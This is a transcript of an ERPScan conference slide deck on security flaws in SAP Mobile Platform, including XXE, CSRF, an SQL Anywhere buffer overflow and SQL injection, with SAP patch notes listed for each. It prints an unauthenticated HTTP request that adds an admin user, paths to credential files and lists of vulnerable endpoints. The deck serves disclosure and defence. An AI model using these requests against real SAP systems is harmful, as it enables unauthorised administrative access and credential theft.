Post on 25-Jul-2015
transcript
Invest in security to secure investments
Attacks on SAP Mobile
Vahagn Vardanyan. ERPScan
Vahagn Vardanyan
SAP and Web application researcher
Specialist degree in information security
2
@vah_13
About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ )
• 60+ presentations key security conferences worldwide
• 25 Awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
3
Agenda
4
About SAP Mobile Platform SAP Control Center SAP SQL Anywhere services SAP Mobile Server SAP Mobile Platform vulnerability Decrypt GIOP protocol XXE SAP Control Center CSRF in SMP 3.0 Cassini 1.0 SQL Anywhere BoF SAP EMR Unwired SQL injection Conclusion
SAP Mobile Platform
5
SMP architecture
6
SMP protocols
SUP 2.1.3 SUP 2.2 SMP 2.3 SMP 3.0
SMP Messaging x x x x
SMP Replication x x x x
HTTP Rest API x x x
SAP Agentry x x
8
SMP services
SAP Control Center
SAP SQL Anywhere services
SAP Mobile Server
9
SAP Control Center
• Working process: sccservice.exe
• Open ports: • 2100 (Messaging service)
• 8282/8283 ( SCC )
• 9999 (RMI)
10
SMP services
SAP Control Center
SAP SQL Anywhere services
SAP Mobile Server
11
SQL Anywhere
• Version 3: 1992
………………………….
• Version 10: 2006 - renamed SQL Anywhere (high availability, intra-query parallelism, materialized views)
• Version 11: 2008 (full text search, BlackBerry support)
• Version 12: 2010 (support for spatial data)
• Version 16: April 18, 2013 - (faster synchronization and improved security)
12
SQL Anywhere
13
SMP services
SAP Control Center
SAP SQL Anywhere services
SAP Mobile Server
14
SAP Mobile Server
• MobiLink
• AdminWebServices
• MlsrvWrapper
• InfoboxMultiplexer
• OBMO
• JMSBridge
15
SAP Mobile Server (MobiLink)
16
AdminWebServices
• Uses Cassini Web Server 1.0
• Listens to the local port 5100
17
SAP Mobile Platform vulnerabilities
18
Decrypting the SAP Mobile Platform GIOP protocol
19
Decrypting the SAP Mobile Platform GIOP protocol
• GIOP – General Inter-ORB Protocol (GIOP) is the abstract protocol by which object request brokers (ORBs) communicate
• Uses mlsrv16.exe (Mobilink) – port 2000
20
XXE in the SAP Mobile Platform portal page
CVE-2015-2813
21
XXE in the SAP Mobile Platform portal page…
22
XXE in the SAP Mobile Platform portal page…
• Portal URL: https://IP_ADDR:8283/scc
• web.xml & services-config.xml
C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml
<servlet-mapping>
<servlet-name>MessageBrokerServlet</servlet-
name>
<url-pattern>/messagebroker/*</url-pattern>
</servlet-mapping>
23
…XXE…
C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml
********************************
<channel-definition id="scc-http"
class="mx.messaging.channels.HTTPChannel">
<endpoint
url="http://{server.name}:{server.port}/scc/messagebroker/http"
class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>
********************************
1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/http
4. /scc/messagebroker/httpsecure
5. /scc/messagebroker/amflongpolling
24
…XXE
25
Read file with XXE
C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties
sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d
26
Decrypt sup.imo.upa
27
SAP Mobile Platform unauthenticated access to other servlets
• Architecture and program vulnerabilities in SAP’s J2EE engine (BlackHat USA 2011)
• web.xml files revealed hidden methods to: – Read and generate logs
28
Prevention
Install SAP security note 2125358 SAP Mobile Platform XXE vulnarability
29
CSRF in SMP 3.0
30
CSRF in SMP 3.0
31
CSRF in SMP 3.0
32
CSRF in SMP 3.0
33
• addAdministrator
• addRepository
• removeServerLogs
• createApplication
• createBackendConnection
********************
Prevention
Install SAP security note 2114316 SAP Mobile Platform CSRF vulnarability
34
Cassini 1.0
35
AdminWebService
POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: length
strUserName=Admin2&strActivationCode=123QWEasd&iExpirat
ionHours=100
36
AdminWebService
37
SAP SQL Anywhere Buffer Overflow/Code Execution
CVE-2015-2819
38
SAP SQL Anywhere BoF/Code Execution
• CVE-2008-0912 – The MobiLink server is affected by a heap overflow which happens
during the handling of strings like username, version, and remote ID (all pre-auth) which are longer than 128 bytes
• CVE-2014-9264 – Stack-based buffer overflow in the .NET Data Provider in SAP SQL
Anywhere allows remote attackers to execute arbitrary code via a crafted column alias
39
First PSH request
40
First PSH request
•
41
SQL Anywhere BoF
42
Prevention
Install SAP security note 2108161 Denial of service in SAP SQL Anywhere
43
SAP EMR Unwired SQL injection
CVE-2013-7096
44
SAP EMR Unwired SQL injection
• CVE-2013-7096 (CVSS 7.5)
• AndroidManifest.xml: <provider android:name=".providers.ModiDataDbProvider"
android:authorities="com.sap.mobi.docsprovider" />
1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat
45
Prevention
Install SAP security note 1864518 Security Improvements for MOB-APP-EMR-AND
46
Conclusion
47
SAP Guides
Regular security assessments
Monitoring technical security
Segregation of Duties
Security events monitoring
Each SAP landscape is unique and we pay close attention to the requirements of
our customers and prospects. ERPScan development team constantly addresses
these specific needs and is actively involved in product advancement. If you wish to
know whether our scanner addresses a particular aspect, or simply have a feature
wish list, please e-mail us. We will be glad to consider your suggestions for the
future releases or monthly updates.
48
About
228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
USA HQ
Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
EU HQ
www.erpscan.com info@erpscan.com